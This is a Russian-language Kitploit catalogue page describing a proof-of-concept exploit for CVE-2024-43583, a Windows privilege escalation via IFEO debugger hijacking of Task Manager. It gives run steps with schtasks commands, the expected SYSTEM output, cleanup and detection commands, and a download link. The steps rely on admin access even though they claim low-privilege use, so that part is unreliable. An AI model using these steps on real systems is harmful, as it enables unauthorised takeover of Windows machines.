Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-43583-PoC — Доказательство концепции для CVE-2024-43583 | Kitploit
Инструменты/GitHubGitHub/kvngtheta/cve-2024-43583-poc
Повышение привилегийАнализ уязвимостейЭксплуатацияОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubkvngtheta/cve-2024-43583-poc

CVE-2024-43583-PoC

Доказательство концепции для CVE-2024-43583

Репозиторий
1131 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-43583 - Эксплуатация повышения привилегий в Windows

Author: No0B@ckSappi3 Instagram: No0BackSappi3

Обзор

CVE-2024-43583 — это уязвимость повышения привилегий, затрагивающая компонент Winlogon от Microsoft. Эксплуатация этой ошибки позволяет пользователю с низкими привилегиями повысить их до SYSTEM, что приводит к полной компрометации системы.

Эта proof-of-concept (PoC) использует перехват отладчика (Debugger Hijacking) через ключ реестра Windows Image File Execution Options (IFEO) для замены легитимного системного процесса вредоносной нагрузкой.

Затронутые версии Windows

Затронутые версии Windows

Windows 10 (1507 - 22H2) Windows 11 (21H2 - 24H2) Windows Server 2008 SP2 - 2022

⚠️ Предупреждение

Этот эксплойт предназначен только для образовательных и исследовательских целей. Не используйте его на несанкционированных системах. Неправомерное использование этого эксплойта может быть незаконным.


Использование эксплойта

Настройка

Убедитесь, что Python установлен на целевой системе. Если нет, используйте скомпилированную версию .exe.

Запуск эксплойта

Вариант 1: Запуск непосредственно от пользователя с низкими привилегиями

root@kitploit:~
python poc-43583.py

Вариант 2: Запуск через планировщик задач

  1. Создание запланированной задачи: (Запуск от имени администратора)

    root@kitploit:~
    schtasks /create /tn "LowPrivExploit" /tr "C:\Path\To\python.exe C:\Path\To\poc-43583.py" /sc once /st 00:00 /ru lowpriv /f
    
  2. Запуск задачи:

    root@kitploit:~
    schtasks /run /tn "LowPrivExploit"
    
  3. Запуск эксплойта: Откройте Диспетчер задач (Ctrl + Shift + Esc). При успехе вместо него появится оболочка SYSTEM.

** Проверка повышения привилегий**

После запуска эксплойта проверьте свои привилегии:

root@kitploit:~
whoami

Ожидаемый вывод:

root@kitploit:~
nt authority\system

🛠️ Очистка

Метод 1: Использование PoC для восстановления значений по умолчанию

Запустите скрипт повторно и выберите вариант [2], чтобы удалить перехват.

Метод 2: Удаление ключа реестра вручную

  1. Откройте Командную строку от имени администратора.
  2. Выполните:
    root@kitploit:~
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f
    
  3. Удалите запланированную задачу (если использовалась):
    root@kitploit:~
    schtasks /delete /tn "LowPrivExploit" /f
    

Обнаружение и смягчение последствий

  • Проверьте наличие неожиданных ключей Debugger:
    root@kitploit:~
    reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
    
  • Включите защиту от несанкционированного доступа Windows Defender Tamper Protection, чтобы предотвратить изменения реестра.
  • Используйте решения EDR/SIEM для обнаружения несанкционированных изменений реестра.

📝 Ссылки

  • Консультация по безопасности Microsoft
  • Руководство по разработке эксплойтов
Скачать инструмент